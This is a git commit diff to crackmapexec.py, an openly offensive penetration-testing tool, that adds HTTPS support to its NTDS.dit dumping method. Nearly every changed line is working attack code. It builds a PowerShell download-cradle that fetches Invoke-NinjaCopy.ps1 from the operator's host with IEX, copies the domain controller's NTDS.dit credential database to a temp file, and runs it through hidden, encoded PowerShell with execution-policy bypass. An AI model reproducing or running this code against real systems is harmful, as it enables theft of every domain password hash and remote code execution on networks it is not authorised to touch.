updated ninja NTDIS.dit method for HTTPS support

2015-10-16 15:31:59 -06:00 · 2015-10-16 15:31:59 -06:00 · 9657a3809c
parent 7d2ba3c63a
commit 9657a3809c
1 changed files with 7 additions and 4 deletions
--- a/crackmapexec.py
+++ b/crackmapexec.py
@ -975,12 +975,15 @@ class RemoteOperations:
            tmpFileName = ''.join([random.choice(string.letters) for _ in range(8)]) + '.tmp'
            local_ip = self.__smbConnection.getSMBServer().get_socket().getsockname()[0]

-            command = """
-            IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-NinjaCopy.ps1');
-            Invoke-NinjaCopy -Path "{ntdspath}" -LocalDestination "$env:systemroot\\Temp\\{tmpname}";
-            """.format(addr=local_ip, ntdspath=ntdsLocation, tmpname=tmpFileName)
+            protocol = 'http'
+            if args.ssl: protocol = 'https'

-            self.__executeRemote('%%COMSPEC%% /C powershell.exe -exec bypass -window hidden -noni -nop -encoded %s' % ps_command(command=command))
+            command = """
+            IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-NinjaCopy.ps1');
+            Invoke-NinjaCopy -Path "{ntdspath}" -LocalDestination "$env:systemroot\\Temp\\{tmpname}";
+            """.format(protocol=protocol, addr=local_ip, ntdspath=ntdsLocation, tmpname=tmpFileName)
+
+            self.__executeRemote('%%COMSPEC%% /C powershell.exe -exec bypass -window hidden -noni -nop -encoded %s' % ps_command(command))
            remoteFileName = RemoteFile(self.__smbConnection, 'Temp\\%s' % tmpFileName)

        else: